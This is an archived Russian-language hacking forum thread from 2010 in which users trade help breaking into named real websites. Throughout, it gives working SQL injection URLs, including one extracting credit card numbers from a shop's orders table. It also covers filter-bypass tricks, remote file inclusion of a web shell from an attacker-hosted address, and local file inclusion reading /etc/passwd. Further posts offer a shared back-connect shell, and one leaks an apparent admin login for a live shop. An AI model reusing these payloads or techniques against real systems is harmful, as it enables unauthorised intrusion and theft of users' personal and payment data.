Просмотр полной версии : Ваши вопросы по уязвимостям.
IMMORTAL_S said:
Объясните "что делает" эта запись
rand(0)|0
?? ну в смысле, для чего нужна вертикальная черта?
MySQL.ru said:
RAND()
RAND()
RAND(N)
Возвращает случайную величину с плавающей точкой в диапазоне от 0 до 1,0. Если целочисленный аргумент N указан, то он используется как начальное значение этой величины
Как-то так
Yetisports
22.07.2010, 21:48
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
Yetisports said:
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/newsletterContent.php?id=-9+union+select+1,2,3,4,5
=\
/showthread.php?p=2254732
IMMORTAL_S
22.07.2010, 21:51
Спасибо конечно.. про rand я знаю а вот для чего |0 непонял
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
IMMORTAL_S said:
Спасибо конечно.. про rand я знаю
а вот для чего
|0
непонял
Это операция Побитового "ИЛИ".
Пример:
Code:
mysql> SELECT 29 | 15;
+---------+
| 29 | 15 |
+---------+
| 31 |
+---------+
1 row in set (0.00 sec)
mysql> SELECT 5|9;
+-----+
| 5|9 |
+-----+
| 13 |
+-----+
1 row in set (0.01 sec)
mysql> SELECT 2|96;
+------+
| 2|96 |
+------+
| 98 |
+------+
1 row in set (0.00 sec)
mysql> SELECT 7|5;
+-----+
| 7|5 |
+-----+
| 7 |
+-----+
1 row in set (0.00 sec)
Можешь сверить по калькулятору(кнопка OR).
bogdan said:
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
Возможно луна в другой фазе.
Code:
UNION SELECT ...DATABASE() FROM USERS
Code:
UNION SELECT ...TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = 'users'
Вполне вероятно, что базы разные.
Anexroid
22.07.2010, 22:51
Нашел SQL-Inj
Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
Anexroid said:
Нашел SQL-Inj
Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
1. Зависит от сервера базы данных - если есть доступ к ней извне или с того же сервера, то можно пробовать брутить.
2. Если ситуация удовлетворяет первому условию, и ты начал брутить, то успех будет зависить от сложности пароля.
Anexroid
22.07.2010, 23:06
Да, нашел вход в phpmyadmin. Имя пользователя знаю.
Авторизация через .htaccess
Вопрос номер 2:
При помощи чего брутить?
Anexroid said:
Да, нашел вход в phpmyadmin. Имя пользователя знаю.
Авторизация через .htaccess
Вопрос номер 2:
При помощи чего брутить?
Скриптами, прогами. Можно даже легендарной Brutus-AE2(так вроде называется), там брут форм есть и Basic Auth
.:GOGA:.
22.07.2010, 23:08
Anexroid
можно заюзать WebBruteForcer
И если вход через .htaccess то имя пользователя моет быть уже другим!!
[Feldmarschall]
22.07.2010, 23:40
Gorev said:
разговор о другой скули друг... посмотри вышe, Попугай имел в виду ошибку на мейл.рy
не заметил(
sry
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
http://www.bildkontakte.de/?f=kwVerg
[Feldmarschall]
23.07.2010, 00:49
AKYLA said:
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
что за тупой линк какой ище mssql есле там редирект ?!
life_glider
23.07.2010, 01:11
копаю движок:
PHP:
echo"
Enter password:
";
можно ли провести пассивную-xss атаку? как и в каких браузерах?
IMMORTAL_S
23.07.2010, 02:24
как же раскрутить скуль
Всем привет!
Помогите советом... как составить запрос, что бы хоть чтонить вывелось... ошибки, etc.
(не могу дать ссылку, т.к. инфа важная)
http://site.com/view.php?id=134
Вот запрос:
SELECT * FROM tbl_art WHERE `GRP_ID` IN (0) AND `OBJ_ID` IN (134)
При view.php?id=134z
SQL ERROR: Unknown column '134z' in 'where clause'
При view.php?id=134z()
SQL ERROR: Column count of mysql.proc is wrong. Expected 20, found 16. Created with MySQL 50077, now running 50148. Please use mysql_upgrade to fix this error.
При view.php?id=999' - выдается сообщение о несуществующей статье (при 999, то же)
При view.php?id=134' - стандартная ошибка sql синтаксиса
При view.php?id=134)+and+(a
SQL ERROR: Unknown column 'a' in 'where clause'
При view.php?id=134)+union+select+(a
SQL ERROR: Unknown column 'a' in 'field list'
При view.php?id=134)+union+select+(user()
SQL ERROR: The used SELECT statements have a different number of columns
При view.php?id=134)+union+select+(1,2
SQL ERROR: Operand should contain 1 column(s)
При view.php?id=134)+union+select+(1),(2),(3),(4 - ошибки нет, но и нет текста статьи
При view.php?id=134)+union+select+1,2,3,4--+ - так же, как и выше
AKYLA said:
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
Эта тема вопросы а не "Ей чуваки расскрутите скуль за меня!!1"
site:свой.сайт.ху* filetypehp inurl:id - и тыкай любимые кавычки!!!
IMMORTAL_S
Трудно сказать без ссылки, хотя б в ПМ что ле раздавал )
стандартные комбинации не подходят?
Попробуй найти другие бажные скрипты, если есть один вполне вероятно что другие там тоже есть )
[Feldmarschall]
23.07.2010, 03:20
IMMORTAL_S
iew.php?id=999'+or+(select+count(*)+from+informati on_schema.tables+group+by+concat(version(),floor(r and(0)*2)))--+
IMMORTAL_S
23.07.2010, 03:27
[Feldmarschall], ты крут
Хотя и пришлось чуть-чуть подправить(не сам код)... но это то что нужно! (метод с Duplicate ложу в копилку)
2 Dare, остался только этот бажный))
Всем спасибо!
SQL ERROR: Duplicate entry '5.1.48-log1' for key 'group_key'
SQL: SELECT * FROM tbl WHERE `GID` IN (0) AND `OID` IN (134) or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))-- )
linuxkernal
23.07.2010, 19:19
Я не могу получить правильное число столбцов и инфицированных колонке для получения данных
http://games.cartoonnetworkhq.com/playGame.php?gameID=-229%20union%20all%20select%201,@@version,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
mailbrush
23.07.2010, 21:37
linuxkernal, там двойной запрос. Раскручивать можно только, как слепую инъекцию, тоесть через "and ..."
linuxkernal
А если почитать эту тему чуть выше, то можно найти решение
Code:
http://games.cartoonnetworkhq.com/playGame.php?gameID=133 and+1=(select+count(*)+from+information_schema.tab les+group+by+concat(version(),floor(rand(0)*2))+li mit+1)/*
happygirl
26.07.2010, 11:26
почему не показать table_name?
http://www.indiajournal.com/info/event.php?id=3041'+and+1=0+union+select+1,table_na me,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20 from%20information_schema.tables%20where%20table_s chema=database() limit 1,1--+
happygirl said:
почему не показать table_name?
http://www.indiajournal.com/info/event.php?id=3041'+and+1=0+union+select+1,table_na me,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20 from%20information_schema.tables%20where%20table_s chema=database() limit 1,1--+
http://www.indiajournal.com/info/event.php?id=3041%27+and+1=2+UnIoN+sElEct+1,tAble_ NamE,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,%2021,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36%20%20from%20information_schema.tables%20where%2 0table_schema=database%28%29%20limit%201,1+--+%27
IMMORTAL_S
26.07.2010, 15:00
SQL ругается на "-" в имени базы
Всем привет.
Впервые столкнулся с такой проблемой... при запросе:
Code:
http://site.com/view/id/1+union+select+1,2,3,concat_ws(':',login,pass),5+f rom+my-schema.members+limit+0,1--.html
выдает ошибку:
Code:
Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-schema.members limit 0,1--' at line 10
Убрать имя базы из запроса нельзя (хотя мот и есть какие хитрости) - выдает ошибку.
Как же разобраться с этой "-" в запросе?
------------------------------------------------------------
Вопрос решен добавлением "`"
xFennyks
26.07.2010, 15:22
в вэбулитен существует возможность при регистрации в email писать все что угодно . как можно это использовать?
CyberHunter
26.07.2010, 16:12
в вэбулитен существует возможность при регистрации в email писать все что угодно . как можно это использовать?
А что можно выжать из этого? Все равно для реги нужно подтверждения по мылу.
xFennyks
26.07.2010, 16:59
потверждение по мыло не нужно! сразу авторизует
ну я не знаю может запрос бд какойнить сделать . подскажите а!
Здравствуйте!Подскажите, пожалуйста!
Ситуация:
Имеется инклудовый сайт, захожу на него шеллом так-
site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
Пробовал и r57shell 1.24 и другие, одинаково.
Может быть сможете что-нибудь посоветовать.
Windows NT VIA-008 5.2 build 3790
Microsoft-IIS/6.0
Заранее большое спасибо!!!
against said:
Здравствуйте!Подскажите, пожалуйста!
Ситуация:
Имеется инклудовый сайт, захожу на него шеллом так-
site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
Пробовал и r57shell 1.24 и другие, одинаково.
Может быть сможете что-нибудь посоветовать.
Windows NT VIA-008 5.2 build 3790
Microsoft-IIS/6.0
Заранее большое спасибо!!!
Сделай так, чтоб параметр page=http://myevilsite.narod.ru/shell.php оставался в адресной строке.
моё мнение что нормальльный хостинг-провайдер....при загрузки в ftp.....будет банить шеллы....только ойда ушёл(у меня такая бня была ужо много раз).....
Нашел скулю, но там фильтруются скобки, как можно обойти данную фильтрацию? Она + еще ко всему Blind, а в Blind, насколько я знаю, без скобок никак не обойтись
ZARO said:
Нашел скулю, но там
фильтруются скобки
, как можно обойти данную фильтрацию? Она + еще ко всему Blind, а в Blind, насколько я знаю, без скобок никак не обойтись
0x28, 0x29
Gorev said:
0x28, 0x29
Не получается! Т.к. если выполнить функцию 0x76657273696F6E2829 (version()) она не будет робит. Сервак приймет это за простую строку и выведет!
ZARO said:
Не получается! Т.к. если выполнить функцию 0x76657273696F6E2829 (version()) она не будет робит. Сервак приймет это за простую строку и выведет!
union+select+version%28%29
Gorev said:
union+select+version%28%29
Я это тоже пробовал, после отправки %28%29 заменяется на () и снова выдает ошибку...
ZARO said:
Я это тоже пробовал, после отправки %28%29 заменяется на () и снова выдает ошибку...
@@version
ZARO
Ты уверен что именно скобки фильтруются, мб просто дело в кодировке, попробуй =)
Dare said:
ZARO
Ты уверен что именно скобки фильтруются, мб просто дело в кодировке, попробуй =)
Вроде только скобки фильтруются, а если дело в кодировке, то как с этим бороться?
Konqi said:
@@version
Да и версию узнать не смогу =) Т.к. там blind, скобки полюбому будут....
ZARO said:
Вроде только скобки фильтруются, а если дело в кодировке, то как с этим бороться?
+union+select+unhex(hex(version())
[Feldmarschall]
28.07.2010, 04:19
попробуй
AES_DECRYPT(AES_ENCRYPT(version()))
"]
[Feldmarschall] said:
+
AES_DECRYPT(AES_ENCRYPT(version()))
aes_decrypt(aes_encrypt(version(),1),1)
или так?
ZARO said:
Вроде только скобки фильтруются, а если дело в кодировке, то как с этим бороться?
клац (https://antichat.live/threads/104591/)
Учимся юзать поиск на форуме..Джокестер в свое время создавал данную тему именно для того что бы в вопросах не было простых вопросов... и кстати отличное пособие для начинающих...надо запретить доступ новичков в ''Ваши вопросы по уязвимостям.''...задолбали уже...охренеть вопрос про кодировку
php_master
28.07.2010, 17:48
шелл
Ребят, помогите с заливкой шелла через инклуд... Имеется скрипт вида
не могу залить т.к. на сервере стоит allow_url_include=0, помогите обойти allow_url_include т.е как то впихнуть http:// Или ftp:// если это возможно
mailbrush
28.07.2010, 17:53
Если стоит allow_url_include, ты ничего удаленно не приинклудишь. Пробуй инклудить енвирон, логи апача.
php_master
28.07.2010, 18:25
блин(( фигово.... енвирон не пашет, т.е. вообще нет /proc/self/environ а логи апача не грузятся из за их большого размера (((
daniel_1024
28.07.2010, 22:55
если вручную не получается, попробуй тулзу Fimap (http://code.google.com/p/fimap/downloads/detail?name=fimap_alpha_v08.1.tar.gz&can=2&q=)
умеет инжектить /proc/self/environ, логи сервера, открывать консоль, парсить сайты с гугла и сканить на rfi/lfi.
php_master said:
блин(( фигово.... енвирон не пашет, т.е. вообще нет /proc/self/environ а логи апача не грузятся из за их большого размера (((
есть альтернатива,попробуй залится через webalizer, если он там есть канешн.
или залей картинку с кодом шелла а потом заинклудь ее...
Объясните плиз почему нет вывода из столба cc_number
Code:
http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and +1=0+Union+Select+1,2,cc_number,4,5,6,7,8+FROM+swe etsunnah.orders+LIMIT+1,1+--+
остальные нормально выводит, например
Code:
http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and +1=0+Union+Select+1,2,billing_country,4,5,6,7,8+FR OM+sweetsunnah.orders+LIMIT+1,1+--+
п.с. пробелы вставил форум (and +1, FR OM, swe etsunnah)
потому что пустые там значения
Code:
http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+and %20+1=0+Union+Select+1,2,group_concat%28cc_number% 29,4,5,6,7,8+FROM+sweetsunnah.orders+--+
Народ вопрос !В php injection плохо шарю но и время нету разбираться допустим есть сайт
http://site.com/?source=about?file=../../../../etc/passwd
получаеться вот так:
Warning: include(pages/about?file=../../../../etc/passwd.php) [function.include]: failed to open stream: No such file or directory in /var/www/core/data/www/site.com/skin/skin.php on line 69
Warning: include() [function.include]: Failed opening 'pages/about?file=../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/core/data/www/site.com/skin/skin.php on line 69
из этого можно вообще что нить сделать?Зараннее спасибо
BrainDeaD
29.07.2010, 22:46
он автоматом ".php" добавляет. пробуй нульбайт (....passwd%00).
a66 said:
Народ вопрос !В php injection плохо шарю но и время нету разбираться допустим есть сайт
http://site.com/?source=about?file=../../../../etc/passwd
получаеться вот так:
Warning: include(pages/about?file=../../../../etc/passwd.php) [function.include]: failed to open stream: No such file or directory in /var/www/core/data/www/site.com/skin/skin.php on line 69
Warning: include() [function.include]: Failed opening 'pages/about?file=../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/core/data/www/site.com/skin/skin.php on line 69
из этого можно вообще что нить сделать?Зараннее спасибо
Во-первых, нужно так:
http://site.com/?source=/../../../../etc/passwd
%00
наткнулся на уязвимую (как мне показалось) страничку
http://www.punkradiocast.com/NEW10.php?start=3
подставляя кавычку, движок вываливает предупреждение и сам запрос к базе... делаем его корректным
http://www.punkradiocast.com/NEW10.php?start=3,3--+
после этого пытался сделать union select - не сработало... даже добавив к запросу and 1=1 имеем ошибку mysql, хотя логика запроса лично мне кажется верной
встречался с таким не один раз, в чем я ошибаюсь? и как построить sql inj в таком случае?
инъекия в лимите
Code:
...active = 1 ORDER BY date_created DESC, sort_name, title LIMIT 1 and 1=1, 3
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/punkradi/public_html/NEW10.php on line 48
Seravin, наверно я плохо объяснил... я имел ввиду запрос такого вида
http://www.punkradiocast.com/NEW10.php?start=3,3+and+1=1--+
какая разница, всё равно после лимита
Dr.Frank
30.07.2010, 09:10
на античате была статья про инъекцию в LIMITе, но нужно, чтобы перед лимитом не было order by, а в приведенном выше примере он есть.
xFennyks
30.07.2010, 09:43
Как провести инклуд если в скрипте только такой код
PHP:
$page=$_GET['page'];
А Include нету О_о (((((
Code:
Как провести инклуд
А Include нету О_о
Эээээх
Gorev said:
клац (https://antichat.live/threads/104591/)
Учимся юзать поиск на форуме..Джокестер в свое время создавал данную тему именно для того что бы в вопросах не было простых вопросов... и кстати отличное пособие для начинающих...надо запретить доступ новичков в ''Ваши вопросы по уязвимостям.''...задолбали уже...охренеть вопрос про кодировку
Не умничай Перепробовал все что возможно, CONVERT(Version(),binary) и т.д. всеравно ошибка, когда в запросе присутствуют скобки...
Вот короче эта скуля - http://www.bikeland.ru/rus/catalog/?action=assortment&id=-95+union+select+1+--+
ZARO said:
Не умничай
Перепробовал все что возможно,
CONVERT(Version(),binary)
и т.д. всеравно ошибка, когда в запросе присутствуют скобки...
Вот короче эта скуля -
http://www.bikeland.ru/rus/catalog/?action=assortment&id=-95+union+select+1+--+
а причем тут кодировка я не понял? скобки и кодировка?никто не умничает...просто ты думай перед тем как бред и чушь всякую постить
для тех кто в танке
''Вопрос №2 Вот так выводит , а вот так невыводит.
site.com/index.php?id=1+union+select+1,2,3,4/*------------выводит
site.com/index.php?id=1+union+select+1,version(),3,4/*----невыводит
Господа, вывод у скули либо есть, либо нет, и если вы видите вывод цифры, но не видите версию или значние из столбца, то варианта 2 либо кодировка, либо тип данных не соответствует
Кодировка:
Может сопровождаться ошибкой такого плана:
Код:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT)
Бороться с этим можно несколькими способами, но все они сводятся к одному и тому-же. Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:
cast(Version()+as+binary)
CONVERT(Version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке
aes_decrypt(aes_encrypt(Version(),1),1)
unhex(hex(version()))
пример, можете поэксперементировать с разными функциями:
http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,cast(version()+as+binary),3,4,5,6 ,7,8,9,10,11,12,13,14+from+information_schema.tabl es--
Несоответствие типа данных вам может встретится на БД отличных от MySql. MySql относится к типам данных достаточно лояльно, а вот другие БД в основном несоответствия не терпят. Если ваша база оказалась именно такой нужно ознакомится со статьями по проведению инъекций в Вашей базе. '' by Jokester
теперь еще раз повторюсь..причем вообще скобки с кодировкой?
можеш; попробовать в жопе пальцем ковырнутся что бы золото добыть, если ничего не получится это не значит что из за того что палец кривой...чуешь?
Есть сайт, крутится на apache2 tomcat
Есть уязвимость, заключается в скачивании любых файлов сервака, типа:
http://www.site.com/image?file=/../../../../../../../../../../../etc/passwd%00.html
Стоит на серваке Jboss, но какая база не ясно, файл etc/mysql/my.cnf прочитал, вот его содержимое:
Code:
[mysqld_safe] socket = /var/run/mysqld/mysqld.sock nice = 0 [mysqld] # # * Basic Settings # user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp language = /usr/share/mysql/english skip-external-locking
!includedir /etc/mysql/conf.d/
логи не ведутся.
Вопрос, куда можно покопать и узнать какой может быть движок базы и как можно узнать есть ли что-то в mysql?
Dedicat_sell
31.07.2010, 02:41
немогу проинклудить useragent
system() и passthru() has been disabled for security reasons in /proc/19925/environ
Как можно обойти это и залить шелл
Dedicat_sell said:
немогу проинклудить useragent
system() и passthru() has been disabled for security reasons in /proc/19925/environ
Как можно обойти это и залить шелл
eval(), copy(), любые другие функции заюзай.
Dedicat_sell
31.07.2010, 14:50
попугай said:
eval(), copy(), любые другие функции заюзай.
Да я все функции перебрал eval(), copy(), system(), passthru(), exec(), может есть скрипт который обходит это дело?
Dedicat_sell said:
Да я все функции перебрал eval(), copy(), system(), passthru(), exec(), может есть скрипт который обходит это дело?
Что, не работают эти функции? Тогда сложновато будет с заливкой шелльца, а даже если зальешь, то все равно трудно будет в управлении - права то обрезаны по самое не балуйся.
[Feldmarschall]
31.07.2010, 18:19
hotice said:
как можно придать этот сайт
тебе не как..
IceJOKER
31.07.2010, 18:42
Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.
Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?
И как найти php inclue ?
Подробно объясните,please...
IceJOKER said:
Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.
Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?
И как найти php inclue ?
Подробно объясните,please...
тынц (https://antichat.live/threads/104591/)
IceJOKER
31.07.2010, 19:39
ТЫНЦ не помогло, вот сайт где скул inj. http://dag-auto.ru/userauto.php?PHPSESSID=LALALA&start=1blabla
IMMORTAL_S
31.07.2010, 22:33
Пытаюсь на сервере прослушать порт netcat'ом, но ничё не получается оО... выдает:
Code:
> nc -l -p 31337
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Хотя я и могу запустить бинд на перле, но хочу понять как это сделать netcat'ом.
IMMORTAL_S
31.07.2010, 22:58
Еще вопрос:
Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись
Code:
Pseudo-terminal will not be allocated because stdin is not a terminal
Что есть этот самый терминал..? где можно почитать про это?
IMMORTAL_S said:
Еще вопрос:
Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись
Code:
Pseudo-terminal will not be allocated because stdin is not a terminal
Что есть этот самый
терминал
..? где можно почитать про это?
Это означает, что тебе нужен бекконект который привязывется к терминалу. Вот держи залил тебе на перле http://www.sendspace.com/file/tsb30y
IMMORTAL_S
01.08.2010, 15:54
Как им правильно пользоваться?
Выдает:
Code:
ERROR: No more pty's avaliable
P.S. Может у кого есть ttyX, что-то нигде не нашел.
Electr0n
01.08.2010, 21:14
информация о табицах не доступна...
возможен просмотр?
Code:
http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,database(),1 2,13,14,15,16,17,18,19,20,21,22--
Electr0n там видимо фильтр на выуживание таблиц, потому что если методом подбора подобрать допустим таблицу users, то поля можно свободно получить, без брута
Вот тебе админка:
http://www.drummersworld.com/dsp/admin/admin.php
technology
fuckwhohackthisshop
http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,column_name, 12,13,14,15,16,17,18,19,20,21,22+from+information_ schema.columns+where+table_name=0x7573657273+--+
Burderator
01.08.2010, 23:24
Нашёл скулу
http://gw.kz/forum/showthread.php?fid=251&tid=38033&block=1'
Что возможно с ней сделать?
инъекция в лимите, читать
Burderator
01.08.2010, 23:55
Seravin said:
инъекция в лимите, читать
линк что читать =) многое перечитал
кароч есть гугл для этого) я нагуглил и ты нагуглишь
Burderator
02.08.2010, 00:09
Seravin said:
кароч есть гугл для этого) я нагуглил и ты нагуглишь
думаешь не искал?) подсказку хотябы...
Burderator said:
думаешь не искал?) подсказку хотябы...
подсказка
http://www.google.ru/search?hl=ru&source=hp&q=sql+%D0%B8%D0%BD%D1%8A%D0%B5%D0%BA%D1%86%D0%B8%D 1%8F+%D0%B2+%D0%BB%D0%B8%D0%BC%D0%B8%D1%82%D0%B5&aq=f&aqi=&aql=&oq=&gs_rfai=
Burderator
02.08.2010, 00:24
Gorev said:
подсказка
http://www.google.ru/search?hl=ru&source=hp&q=sql+%D0%B8%D0%BD%D1%8A%D0%B5%D0%BA%D1%86%D0%B8%D 1%8F+%D0%B2+%D0%BB%D0%B8%D0%BC%D0%B8%D1%82%D0%B5&aq=f&aqi=&aql=&oq=&gs_rfai=
sql инъекци%D 1Џ РІ лимите криво выводиться запрос на поиск =/
млядь sql инъекция в лимите .... сложно понять и в гугл вбить?
Burderator
02.08.2010, 01:23
Gorev said:
млядь sql инъекция в лимите .... сложно понять и в гугл вбить?
Да искал,до гугла сюда бы не написал
IMMORTAL_S said:
Как им правильно пользоваться?
Выдает:
Code:
ERROR: No more pty's avaliable
P.S. Может у кого есть ttyX, что-то нигде не нашел.
Отписал тебе в приват.
Привет. Есть уязвимость формата http://domain/'sp%20ace
Ответ:
Code:
Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
Session halted.
Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
roddik said:
Привет. Есть уязвимость формата http://domain/'sp%20ace
Ответ:
Code:
Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
Session halted.
Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
заюзай /**/
Ottiko said:
Очень вот очень нужна слить
Сайт (http://vsbrothers.com)
Всё что найденно:
спс.Ув. ))
тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
Gorev said:
тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
Через софт поимал вроде куки авторизации пользователя (может админ )
POST http://en.vsbrothers.com/sign-in.html
Cookie: PHPSESSID=40e01aae3404c21c830ee31f58bfbb71
reg[username]=114082®[password]=40e01aae3404c21c830ee31f58bfbb71
Это что нибудь даст, или мелочь?
Ещё чита тему Xss для новичков (https://antichat.live/threads/20140/) только не очень разобрался...
M_script
03.08.2010, 09:43
Ottiko said:
Это что нибудь даст, или мелочь?
Это ничего не даст.
M_script said:
Это ничего не даст.
Так вроде сканер нашол XSS уязвимость...
Request: http://en.vsbrothers.com/sign-in.html
Parameter Type: POST
Test Name: Cross-Site Scripting (XSS)
Severity: High
Или я путаю...
M_script
03.08.2010, 10:10
Я про куки. Эти куки ничего не дадут.
InfectedM
03.08.2010, 16:43
есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена...
Есть какой-нибудь простой способ спалить домены?
InfectedM said:
есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена...
Есть какой-нибудь простой способ спалить домены?
Конфиг апача.
попугай said:
заюзай /**/
Спасибо за идею, я правильно понял?
Code:
http://domain/'/**/union/**/select/**/1,2,3#comment
выводит
Code:
Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Session halted.
XENON4IK
04.08.2010, 02:53
Помогите с анализом кода. в нём есть скуля? если есть как её заюзать?
PHP:
'')
{
echo"error sql";
Header("Location:client.php");
}
if (mysql_num_rows($q) ==0)Header("Location:client.php?e=1");
else
{
while($r=mysql_fetch_row($q))
{
print"Здраствуйте уважаемый(ая), ";
$i=0;
while ((mysql_num_fields( $q) -$i) !=0)
{
echo"$r[$i]
";
$i+=1;
}
}
}
mysql_close($link);
}
else
{
Header("Location:error.php");
}
?>
больше нет чем да, я просто хз есть ли баги в самой функции preg_match, но их вроде нет
roddik said:
Спасибо за идею, я правильно понял?
Code:
http://domain/'/**/union/**/select/**/1,2,3#comment
выводит
Code:
Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Session halted.
#comment - это ты так коментишь прям в браузере?
Если да, то попробуй так /*
Ещё стоит мне кажется что нибудь перед UNION написать типа
domain/test'/**/union ....
Dr.Frank
04.08.2010, 14:39
roddik, попробуй http://domain/'/**/union/**/select/**/1,2,3/*
т.е. в конце комментарий повешай
XENON4IK, т.к. в строчке $sq="select name from user where id ='$id'"; запрашивается просто $id то в строке адреса укажи нормальный id(например 321), а в POST запросе посылай инъекцию, или в COOKIE т.к. и пост и куки перебивают массив GET, а проверка идет только на ГЕТ.
Seravin, где ты вообще preg_replace увидел?
tompson_
04.08.2010, 21:12
есть скуля вида
SELECT * FROM table WHERE id='123[inj]'
последняя кавычка учитывается в запросе в любом случае и вариант
[inj] = ' union select 1,2,3--
не прокатывает. не только --, но и /* /**/ ; никакие комментарии не работают. в итоге если
[inj] = 'order by 1--
выводит
SELECT * FROM table WHERE id='123' order by 1--'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
я подобрал количество столбцов запросом, где
[inj] = '+union+select+1,2,3,'
получилось
SELECT * FROM table WHERE id='123' union select 1,2,3,''
но в скрипте идет следующий запрос, который выдает ошибку
UPDATE table SET views=views+1 WHERE id='123' union select 1,2,3,''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,''' at line 1
можно ли обойти UPDATE и как это сделать?
-PRIVAT-
04.08.2010, 22:02
Линк на скулю дай.
Dr.Frank said:
roddik, попробуй http://domain/'/**/union/**/select/**/1,2,3/*
т.е. в конце комментарий повешай
